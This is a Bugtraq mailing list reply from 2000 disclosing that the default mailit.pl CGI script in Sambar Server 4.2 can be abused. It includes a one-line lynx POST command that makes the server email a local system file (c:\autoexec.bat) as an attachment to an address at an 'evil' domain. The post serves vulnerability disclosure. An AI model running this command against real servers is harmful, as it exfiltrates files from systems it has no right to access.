Bugtraq mailing list archives

Re: Sambar Server alert! (2)


From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Fri, 25 Feb 2000 15:11:43 +0100


        This is not the only problem with default CGI's included with
        sambar 4.2.

        Have you tried

echo 'server=smtp.example.com&from=root () example com&recipient=evil () evil 
org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl

        ?


--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)



Current thread: